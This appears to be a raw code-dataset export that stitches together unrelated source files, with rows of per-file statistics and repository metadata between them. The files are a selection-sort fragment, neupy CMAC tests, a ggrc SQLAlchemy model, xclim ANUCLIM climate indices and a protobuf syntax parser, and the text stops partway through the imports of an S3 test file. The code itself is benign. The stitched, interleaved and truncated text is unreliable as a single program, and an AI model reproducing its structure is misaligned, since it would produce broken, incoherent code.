for j in range(i+1, n): # find the smallest element of the list from position i + 1 on
if A[j] < A[min_idx]:
min_idx = j
A[i], A[min_idx] = A[min_idx], A[i] # put the element in its correct position
return A
# 1 + (n-1)*[3 + X] = 1 + 3*(n-1) + X*(n-1) = 1 + 3*(n-1) + (n^2 + n - 2)/2
# = (1 - 3 - 1) + (3n + n/2) + (n^2/2)
# The complexity is O(n^2)
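# Example: selection_sort([29, 10, 14, 37, 13]) returns [10, 13, 14, 29, 37]
# (the sort is in place, so the input list is mutated as well).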
| 36.769231
| 86
| 0.464435
| 98
| 478
| 2.255102
| 0.357143
| 0.054299
| 0.040724
| 0.036199
| 0.045249
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078864
| 0.33682
| 478
| 13
| 87
| 36.769231
| 0.618297
| 0.520921
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1379b64de3a90f72d35d03219b56d72544b5e73a
| 2,806
|
py
|
Python
|
tests/algorithms/memory/test_cmac.py
|
FrostByte266/neupy
|
4b7127e5e4178b0cce023ba36542f5ad3f1d798c
|
[
"MIT"
] | 801
|
2015-09-23T09:24:47.000Z
|
2022-03-29T19:19:03.000Z
|
tests/algorithms/memory/test_cmac.py
|
FrostByte266/neupy
|
4b7127e5e4178b0cce023ba36542f5ad3f1d798c
|
[
"MIT"
] | 277
|
2015-09-22T19:48:50.000Z
|
2022-03-11T23:25:32.000Z
|
tests/algorithms/memory/test_cmac.py
|
FrostByte266/neupy
|
4b7127e5e4178b0cce023ba36542f5ad3f1d798c
|
[
"MIT"
] | 194
|
2015-09-23T15:03:57.000Z
|
2022-03-31T13:54:46.000Z
|
import numpy as np
from sklearn import metrics
from neupy import algorithms
from base import BaseTestCase
class CMACTestCase(BaseTestCase):
def test_cmac(self):
X_train = np.reshape(np.linspace(0, 2 * np.pi, 100), (100, 1))
X_train_before = X_train.copy()
X_test = np.reshape(np.linspace(np.pi, 2 * np.pi, 50), (50, 1))
y_train = np.sin(X_train)
y_train_before = y_train.copy()
y_test = np.sin(X_test)
cmac = algorithms.CMAC(
quantization=100,
associative_unit_size=32,
step=0.2,
verbose=False,
)
cmac.train(X_train, y_train, epochs=100)
predicted_test = cmac.predict(X_test)
predicted_test = predicted_test.reshape((len(predicted_test), 1))
error = metrics.mean_absolute_error(y_test, predicted_test)
self.assertAlmostEqual(error, 0.0024, places=4)
# Test that algorithm didn't modify data samples
np.testing.assert_array_equal(X_train, X_train_before)
np.testing.assert_array_equal(X_train, X_train_before)
np.testing.assert_array_equal(y_train, y_train_before)
self.assertPickledNetwork(cmac, X_train)
def test_train_different_inputs(self):
self.assertInvalidVectorTrain(
network=algorithms.CMAC(),
input_vector=np.array([1, 2, 3]),
target=np.array([1, 2, 3])
)
def test_predict_different_inputs(self):
cmac = algorithms.CMAC()
data = np.array([[1, 2, 3]]).T
target = np.array([[1, 2, 3]]).T
cmac.train(data, target, epochs=100)
self.assertInvalidVectorPred(
network=cmac,
input_vector=np.array([1, 2, 3]),
target=target,
decimal=2
)
def test_cmac_multi_output(self):
X_train = np.linspace(0, 2 * np.pi, 100)
X_train = np.vstack([X_train, X_train])
X_test = np.linspace(0, 2 * np.pi, 100)
X_test = np.vstack([X_test, X_test])
y_train = np.sin(X_train)
y_test = np.sin(X_test)
cmac = algorithms.CMAC(
quantization=100,
associative_unit_size=32,
step=0.2,
)
cmac.train(X_train, y_train,
X_test, y_test, epochs=100)
predicted_test = cmac.predict(X_test)
error = metrics.mean_absolute_error(y_test, predicted_test)
self.assertAlmostEqual(error, 0, places=6)
def test_cmac_training_exceptions(self):
cmac = algorithms.CMAC(
quantization=100,
associative_unit_size=32,
step=0.2,
)
with self.assertRaises(ValueError):
cmac.train(X_train=True, y_train=True,
X_test=None, y_test=True)
| 30.172043
| 73
| 0.599786
| 371
| 2,806
| 4.304582
| 0.22372
| 0.06387
| 0.041327
| 0.028178
| 0.489042
| 0.489042
| 0.438948
| 0.405135
| 0.332498
| 0.293676
| 0
| 0.040323
| 0.292944
| 2,806
| 92
| 74
| 30.5
| 0.764617
| 0.016393
| 0
| 0.342857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128571
| 1
| 0.071429
| false
| 0
| 0.057143
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
137a3688b49f0ea26253687c4f9e076efa9114c9
| 3,075
|
py
|
Python
|
src/ggrc_workflows/models/task_group_object.py
|
Smotko/ggrc-core
|
b3abb58b24e7559960d71a94ba79c75539e7fe29
|
[
"Apache-2.0"
] | null | null | null |
src/ggrc_workflows/models/task_group_object.py
|
Smotko/ggrc-core
|
b3abb58b24e7559960d71a94ba79c75539e7fe29
|
[
"Apache-2.0"
] | 12
|
2015-01-08T14:50:19.000Z
|
2017-11-29T19:37:53.000Z
|
src/ggrc_workflows/models/task_group_object.py
|
Smotko/ggrc-core
|
b3abb58b24e7559960d71a94ba79c75539e7fe29
|
[
"Apache-2.0"
] | 1
|
2015-01-08T13:25:09.000Z
|
2015-01-08T13:25:09.000Z
|
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: dan@reciprocitylabs.com
# Maintained By: dan@reciprocitylabs.com
from sqlalchemy.ext.associationproxy import association_proxy
from ggrc import db
from ggrc.models.mixins import Mapping
from ggrc.models.mixins import Timeboxed
from ggrc.models.reflection import PublishOnly
class TaskGroupObject(Timeboxed, Mapping, db.Model):
__tablename__ = 'task_group_objects'
task_group_id = db.Column(
db.Integer, db.ForeignKey('task_groups.id'), nullable=False)
object_id = db.Column(db.Integer, nullable=False)
object_type = db.Column(db.String, nullable=False)
@property
def object_attr(self):
return '{0}_object'.format(self.object_type)
@property
def object(self):
return getattr(self, self.object_attr)
@object.setter
def object(self, value):
self.object_id = value.id if value is not None else None
self.object_type = value.__class__.__name__ if value is not None \
else None
return setattr(self, self.object_attr, value)
@staticmethod
def _extra_table_args(cls):
return (
db.UniqueConstraint('task_group_id', 'object_id', 'object_type'),
db.Index('ix_task_group_id', 'task_group_id'),
)
_publish_attrs = [
'task_group',
'object',
]
_sanitize_html = []
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(TaskGroupObject, cls).eager_query()
return query.options(
orm.subqueryload('task_group'))
def _display_name(self):
return self.object.display_name + '<->' + self.task_group.display_name
def copy(self, _other=None, **kwargs):
columns = [
'task_group', 'object_id', 'object_type'
]
target = self.copy_into(_other, columns, **kwargs)
return target
class TaskGroupable(object):
@classmethod
def late_init_task_groupable(cls):
def make_task_group_objects(cls):
cls.task_groups = association_proxy(
'task_group_objects', 'task_group',
creator=lambda task_group: TaskGroupObject(
task_group=task_group,
object_type=cls.__name__,
)
)
joinstr = 'and_(foreign(TaskGroupObject.object_id) == {type}.id, '\
'foreign(TaskGroupObject.object_type) == "{type}")'
joinstr = joinstr.format(type=cls.__name__)
return db.relationship(
'TaskGroupObject',
primaryjoin=joinstr,
backref='{0}_object'.format(cls.__name__),
cascade='all, delete-orphan',
)
cls.task_group_objects = make_task_group_objects(cls)
_publish_attrs = [
PublishOnly('task_groups'),
'task_group_objects',
]
_include_links = []
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(TaskGroupable, cls).eager_query()
return cls.eager_inclusions(query, TaskGroupable._include_links).options(
orm.subqueryload('task_group_objects'))
| 29.285714
| 78
| 0.690407
| 375
| 3,075
| 5.373333
| 0.317333
| 0.084864
| 0.055583
| 0.022829
| 0.206452
| 0.083375
| 0.083375
| 0.059553
| 0.059553
| 0.059553
| 0
| 0.003251
| 0.199675
| 3,075
| 104
| 79
| 29.567308
| 0.815522
| 0.074146
| 0
| 0.1375
| 0
| 0
| 0.135116
| 0.02639
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.0875
| 0.05
| 0.45
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
137dda311b44a103b066cfeaf00c02a9bb814cbf
| 19,777
|
py
|
Python
|
xclim/indices/_anuclim.py
|
bzah/xclim
|
18ceee3f1db2d39355913c1c60ec32ddca6baccc
|
[
"Apache-2.0"
] | 1
|
2022-02-03T13:46:58.000Z
|
2022-02-03T13:46:58.000Z
|
xclim/indices/_anuclim.py
|
raquel-ucl/xclim
|
6102e542e6e08072a60879d6200f9340207cd50e
|
[
"Apache-2.0"
] | 2
|
2021-06-23T09:26:54.000Z
|
2021-07-26T19:28:41.000Z
|
xclim/indices/_anuclim.py
|
raquel-ucl/xclim
|
6102e542e6e08072a60879d6200f9340207cd50e
|
[
"Apache-2.0"
] | 1
|
2021-03-02T20:12:28.000Z
|
2021-03-02T20:12:28.000Z
|
# noqa: D100
from typing import Optional
import numpy as np
import xarray
from xclim.core.units import (
convert_units_to,
declare_units,
pint_multiply,
rate2amount,
units,
units2pint,
)
from xclim.core.utils import ensure_chunk_size
from ._multivariate import (
daily_temperature_range,
extreme_temperature_range,
precip_accumulation,
)
from ._simple import tg_mean
from .generic import select_resample_op
from .run_length import lazy_indexing
# Frequencies : YS: year start, QS-DEC: seasons starting in december, MS: month start
# See http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases
# -------------------------------------------------- #
# ATTENTION: ASSUME ALL INDICES WRONG UNTIL TESTED ! #
# -------------------------------------------------- #
__all__ = [
"temperature_seasonality",
"precip_seasonality",
"tg_mean_warmcold_quarter",
"tg_mean_wetdry_quarter",
"prcptot_wetdry_quarter",
"prcptot_warmcold_quarter",
"prcptot",
"prcptot_wetdry_period",
"isothermality",
]
_xr_argops = {
"wettest": xarray.DataArray.argmax,
"warmest": xarray.DataArray.argmax,
"dryest": xarray.DataArray.argmin,
"driest": xarray.DataArray.argmin,
"coldest": xarray.DataArray.argmin,
}
_np_ops = {
"wettest": "max",
"warmest": "max",
"dryest": "min",
"driest": "min",
"coldest": "min",
}
@declare_units(tasmin="[temperature]", tasmax="[temperature]")
def isothermality(
tasmin: xarray.DataArray, tasmax: xarray.DataArray, freq: str = "YS"
) -> xarray.DataArray:
r"""Isothermality.
The mean diurnal range divided by the annual temperature range.
Parameters
----------
tasmin : xarray.DataArray
Average daily minimum temperature at daily, weekly, or monthly frequency.
tasmax : xarray.DataArray
Average daily maximum temperature at daily, weekly, or monthly frequency.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [%]
Isothermality
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the output with input data with daily frequency as well. As such weekly or monthly input values, if desired, should
be calculated prior to calling the function.
"""
dtr = daily_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq)
etr = extreme_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq)
with xarray.set_options(keep_attrs=True):
iso = dtr / etr * 100
iso.attrs["units"] = "%"
return iso
@declare_units(tas="[temperature]")
def temperature_seasonality(tas: xarray.DataArray) -> xarray.DataArray:
r"""ANUCLIM temperature seasonality (coefficient of variation).
The annual temperature coefficient of variation expressed in percent. Calculated as the standard deviation
of temperature values for a given year expressed as a percentage of the mean of those temperatures.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
Returns
-------
xarray.DataArray, [%]
Mean temperature coefficient of variation
Examples
--------
The following would compute for each grid cell of file `tas.day.nc` the annual temperature seasonality:
>>> import xclim.indices as xci
>>> t = xr.open_dataset(path_to_tas_file).tas
>>> tday_seasonality = xci.temperature_seasonality(t)
>>> t_weekly = xci.tg_mean(t, freq='7D')
>>> tweek_seasonality = xci.temperature_seasonality(t_weekly)
Notes
-----
For this calculation, the mean in degrees Kelvin is used. This avoids the possibility of having to
divide by zero, but it does mean that the values are usually quite small.
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be
calculated prior to calling the function.
"""
tas = convert_units_to(tas, "K")
with xarray.set_options(keep_attrs=True):
seas = 100 * _anuclim_coeff_var(tas)
seas.attrs["units"] = "%"
return seas
@declare_units(pr="[precipitation]")
def precip_seasonality(
pr: xarray.DataArray,
) -> xarray.DataArray:
r"""ANUCLIM Precipitation Seasonality (C of V).
The annual precipitation Coefficient of Variation (C of V) expressed in percent. Calculated as the standard deviation
of precipitation values for a given year expressed as a percentage of the mean of those values.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
Units need to be defined as a rate (e.g. mm d-1, mm week-1).
Returns
-------
xarray.DataArray, [%]
Precipitation coefficient of variation
Examples
--------
The following would compute for each grid cell of file `pr.day.nc` the annual precipitation seasonality:
>>> import xclim.indices as xci
>>> p = xr.open_dataset(path_to_pr_file).pr
>>> pday_seasonality = xci.precip_seasonality(p)
>>> p_weekly = xci.precip_accumulation(p, freq='7D')
# Input units need to be a rate
>>> p_weekly.attrs['units'] = "mm/week"
>>> pweek_seasonality = xci.precip_seasonality(p_weekly)
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
If input units are in mm s-1 (or equivalent) values are converted to mm/day to avoid potentially small denominator
values.
"""
# If units in mm/sec convert to mm/days to avoid potentially small denominator
if units2pint(pr) == units("mm / s"):
pr = convert_units_to(pr, "mm d-1")
with xarray.set_options(keep_attrs=True):
seas = 100 * _anuclim_coeff_var(pr)
seas.attrs["units"] = "%"
return seas
@declare_units(tas="[temperature]")
def tg_mean_warmcold_quarter(
tas: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Mean temperature of warmest/coldest quarter.
The warmest (or coldest) quarter of the year is determined, and the mean temperature of this period is
calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13 week periods,
otherwise as 3 months.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
op : str {'warmest', 'coldest'}
Operation to perform: 'warmest' calculate warmest quarter; 'coldest' calculate coldest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [same as tas]
Mean temperature values of the {op} quarter of each year.
Examples
--------
The following would compute for each grid cell of file `tas.day.nc` the annual temperature
warmest quarter mean temperature:
>>> import xclim.indices as xci
>>> t = xr.open_dataset(path_to_tas_file)
>>> t_warm_qrt = xci.tg_mean_warmcold_quarter(tas=t.tas, op='warmest', src_timestep='daily')
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
out = _to_quarter(src_timestep, tas=tas)
oper = _np_ops[op]
out = select_resample_op(out, oper, freq)
out.attrs["units"] = tas.units
return out
@declare_units(tas="[temperature]", pr="[precipitation]")
def tg_mean_wetdry_quarter(
tas: xarray.DataArray,
pr: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Mean temperature of wettest/driest quarter.
The wettest (or driest) quarter of the year is determined, and the mean temperature of this period is calculated.
If the input data frequency is daily ("D") or weekly ("W"), quarters are defined as 13-week periods, otherwise as 3 months.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
op : {'wettest', 'driest'}
Operation to perform: 'wettest' calculate for the wettest quarter; 'driest' calculate for the driest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [same as tas]
Mean temperature values of the {op} quarter of each year.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
tas_qrt = _to_quarter(src_timestep, tas=tas)
pr_qrt = _to_quarter(src_timestep, pr=pr)
xr_op = _xr_argops[op]
with xarray.set_options(keep_attrs=True):
out = _from_other_arg(criteria=pr_qrt, output=tas_qrt, op=xr_op, freq=freq)
out.attrs = tas.attrs
return out
@declare_units(pr="[precipitation]")
def prcptot_wetdry_quarter(
pr: xarray.DataArray, op: str = None, src_timestep: str = None, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM Total precipitation of wettest/driest quarter.
The wettest (or driest) quarter of the year is determined, and the total precipitation of this
period is calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters
are defined as 13-week periods, otherwise as 3 months.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
op : {'wettest', 'driest'}
Operation to perform : 'wettest' calculate wettest quarter ; 'driest' calculate driest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation values of the {op} quarter of each year.
Examples
--------
The following would compute for each grid cell of file `pr.day.nc` the annual wettest quarter total precipitation:
>>> from xclim.indices import prcptot_wetdry_quarter
>>> p = xr.open_dataset(path_to_pr_file)
>>> pr_warm_qrt = prcptot_wetdry_quarter(pr=p.pr, op='wettest', src_timestep='D')
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
# returns mm values
pr_qrt = _to_quarter(src_timestep, pr=pr)
try:
oper = _np_ops[op]
except KeyError:
raise NotImplementedError(
f'Unknown operation "{op}" ; not one of "wettest" or "driest"'
)
out = select_resample_op(pr_qrt, oper, freq)
out.attrs["units"] = pr_qrt.units
return out
@declare_units(pr="[precipitation]", tas="[temperature]")
def prcptot_warmcold_quarter(
pr: xarray.DataArray,
tas: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Total precipitation of warmest/coldest quarter.
The warmest (or coldest) quarter of the year is determined, and the total
precipitation of this period is calculated. If the input data frequency is daily ("D") or weekly ("W"), quarters
are defined as 13-week periods, otherwise as 3 months.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
op : {'warmest', 'coldest'}
Operation to perform: 'warmest' calculate for the warmest quarter ; 'coldest' calculate for the coldest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray : [mm]
Total precipitation values of the {op} quarter of each year
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
# determine input data frequency
tas_qrt = _to_quarter(src_timestep, tas=tas)
# returns mm values
pr_qrt = _to_quarter(src_timestep, pr=pr)
xr_op = _xr_argops[op]
out = _from_other_arg(criteria=tas_qrt, output=pr_qrt, op=xr_op, freq=freq)
out.attrs = pr_qrt.attrs
return out
@declare_units(pr="[precipitation]")
def prcptot(
pr: xarray.DataArray, src_timestep: str = None, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM Accumulated total precipitation.
Parameters
----------
pr : xarray.DataArray
Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well.
"""
pram = rate2amount(pr)
return pram.resample(time=freq).sum(dim="time", keep_attrs=True)
# FIXME: src_timestep is not used here.
@declare_units(pr="[precipitation]")
def prcptot_wetdry_period(
pr: xarray.DataArray, *, op: str, src_timestep: str, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM precipitation of the wettest/driest day, week, or month, depending on the time step.
Parameters
----------
pr : xarray.DataArray
Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar.
op : {'wettest', 'driest'}
Operation to perform : 'wettest' calculate wettest period ; 'driest' calculate driest period.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation of the {op} period.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
pram = rate2amount(pr)
if op == "wettest":
return pram.resample(time=freq).max(dim="time", keep_attrs=True)
if op == "driest":
return pram.resample(time=freq).min(dim="time", keep_attrs=True)
raise NotImplementedError(
f'Unknown operation "{op}" ; op parameter must be one of "wettest" or "driest"'
)
def _anuclim_coeff_var(arr: xarray.DataArray) -> xarray.DataArray:
"""Calculate the annual coefficient of variation for ANUCLIM indices."""
std = arr.resample(time="YS").std(dim="time")
mu = arr.resample(time="YS").mean(dim="time")
return std / mu
def _from_other_arg(
criteria: xarray.DataArray, output: xarray.DataArray, op, freq: str
) -> xarray.DataArray:
"""Pick values from output based on operation returning an index from criteria.
Parameters
----------
criteria : DataArray
Series on which operation returning index is applied.
output : DataArray
Series to be indexed.
op : func
Function returning an index, for example np.argmin, np.argmax, np.nanargmin, np.nanargmax.
freq : str
Temporal grouping.
Returns
-------
DataArray
Output values where criteria is met at the given frequency.
"""
ds = xarray.Dataset(data_vars={"criteria": criteria, "output": output})
dim = "time"
def get_other_op(dataset):
all_nans = dataset.criteria.isnull().all(dim=dim)
index = op(dataset.criteria.where(~all_nans, 0), dim=dim)
return lazy_indexing(dataset.output, index=index, dim=dim).where(~all_nans)
return ds.resample(time=freq).map(get_other_op)
def _to_quarter(
freq: str,
pr: Optional[xarray.DataArray] = None,
tas: Optional[xarray.DataArray] = None,
) -> xarray.DataArray:
"""Convert daily, weekly or monthly time series to quarterly time series according to ANUCLIM specifications."""
if freq.upper().startswith("D"):
if tas is not None:
tas = tg_mean(tas, freq="7D")
if pr is not None:
# Accumulate on a week
# Ensure units are back to a "rate" for rate2amount below
pr = convert_units_to(precip_accumulation(pr, freq="7D"), "mm")
pr.attrs["units"] = "mm/week"
freq = "W"
if freq.upper().startswith("W"):
window = 13
elif freq.upper().startswith("M"):
window = 3
else:
raise NotImplementedError(
f'Unknown input time frequency "{freq}": must be one of "D", "W" or "M".'
)
if tas is not None:
tas = ensure_chunk_size(tas, time=np.ceil(window / 2))
if pr is not None:
pr = ensure_chunk_size(pr, time=np.ceil(window / 2))
if pr is not None:
pram = rate2amount(pr)
out = pram.rolling(time=window, center=False).sum()
out.attrs = pr.attrs
out.attrs["units"] = pram.units
if tas is not None:
out = tas.rolling(time=window, center=False).mean(skipna=False)
out.attrs = tas.attrs
out = ensure_chunk_size(out, time=-1)
return out
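# --- Illustrative usage sketch (not part of the original module). ---
# A minimal, self-contained demonstration of the private helper
# `_anuclim_coeff_var` defined above (annual std/mean); the synthetic
# two-year daily precipitation series below is an assumption made purely
# for demonstration purposes.
if __name__ == "__main__":
    import pandas as pd

    _time = pd.date_range("2000-01-01", periods=730, freq="D")
    _pr = xarray.DataArray(
        np.random.default_rng(0).gamma(2.0, 1.5, size=_time.size),
        coords={"time": _time},
        dims="time",
        name="pr",
    )
    # One coefficient of variation per year ("YS" resampling).
    print(_anuclim_coeff_var(_pr))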
| 35.190391
| 128
| 0.674369
| 2,637
| 19,777
| 4.972696
| 0.125142
| 0.062915
| 0.038893
| 0.034775
| 0.662396
| 0.605735
| 0.579883
| 0.545794
| 0.530008
| 0.505224
| 0
| 0.005098
| 0.216464
| 19,777
| 561
| 129
| 35.253119
| 0.84112
| 0.602063
| 0
| 0.331683
| 0
| 0.004951
| 0.112171
| 0.019968
| 0
| 0
| 0
| 0.001783
| 0
| 1
| 0.064356
| false
| 0
| 0.044554
| 0
| 0.178218
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
137fdb8af310be2f7cdaeb72968e537c0108415a
| 888
|
py
|
Python
|
src/proto_formatter/syntax_parser.py
|
YiXiaoCuoHuaiFenZi/proto-formatter
|
ac8c913a8c3854e840aa4f015c026e58ee023b0b
|
[
"MIT"
] | null | null | null |
src/proto_formatter/syntax_parser.py
|
YiXiaoCuoHuaiFenZi/proto-formatter
|
ac8c913a8c3854e840aa4f015c026e58ee023b0b
|
[
"MIT"
] | null | null | null |
src/proto_formatter/syntax_parser.py
|
YiXiaoCuoHuaiFenZi/proto-formatter
|
ac8c913a8c3854e840aa4f015c026e58ee023b0b
|
[
"MIT"
] | null | null | null |
from .comment import CommentParser
from .protobuf import Protobuf
from .proto_structures import Syntax
class SyntaxParser():
@classmethod
def parse_and_add(cls, proto_obj: Protobuf, line, top_comment_list):
if proto_obj.syntax is not None:
            raise Exception('multiple syntax detected!')
proto_obj.syntax = cls.parse_syntax(line, top_comment_list)
@classmethod
def parse_syntax(cls, line, top_comment_list):
value = cls._get_syntax_value(line)
comments = CommentParser.create_comment(line, top_comment_list)
syntax = Syntax(value, comments)
return syntax
@classmethod
def _get_syntax_value(cls, line):
line = line.strip().replace(' ', '')
lindex = len('syntax=')
rindex = line.index(';')
value = line[lindex:rindex].strip().replace('"', "").replace("'", "")
return value
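# --- Illustrative usage sketch (not part of the original module). ---
# Demonstrates what `_get_syntax_value` extracts from a typical proto
# syntax declaration; the sample line is an assumption for demonstration.
if __name__ == '__main__':
    sample_line = 'syntax = "proto3";'
    # Spaces are removed, the slice between "syntax=" and ";" is taken,
    # and the surrounding quotes are stripped -> prints: proto3
    print(SyntaxParser._get_syntax_value(sample_line))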
| 29.6
| 77
| 0.657658
| 104
| 888
| 5.394231
| 0.365385
| 0.049911
| 0.099822
| 0.128342
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230856
| 888
| 29
| 78
| 30.62069
| 0.821376
| 0
| 0
| 0.136364
| 0
| 0
| 0.040541
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.136364
| false
| 0
| 0.136364
| 0
| 0.409091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13829c0823e4f1af5270d26df1460fb75ccc8a6b
| 47,884
|
py
|
Python
|
tests/test_s3.py
|
tdilauro/circulation-core
|
8086ca8cbedd5f4b2a0c44df97889d078ff79aac
|
[
"Apache-2.0"
] | 1
|
2021-11-16T00:58:43.000Z
|
2021-11-16T00:58:43.000Z
|
tests/test_s3.py
|
tdilauro/circulation-core
|
8086ca8cbedd5f4b2a0c44df97889d078ff79aac
|
[
"Apache-2.0"
] | 16
|
2021-05-17T19:24:47.000Z
|
2021-12-15T13:57:34.000Z
|
tests/test_s3.py
|
tdilauro/circulation-core
|
8086ca8cbedd5f4b2a0c44df97889d078ff79aac
|
[
"Apache-2.0"
] | 1
|
2021-05-12T19:11:52.000Z
|
2021-05-12T19:11:52.000Z
|
# encoding: utf-8
import functools
import os
from urllib.parse import urlsplit
import boto3
import botocore
import pytest
from botocore.exceptions import BotoCoreError, ClientError
from mock import MagicMock
from parameterized import parameterized
from ..mirror import MirrorUploader
from ..model import (
DataSource,
ExternalIntegration,
Hyperlink,
Identifier,
Representation,
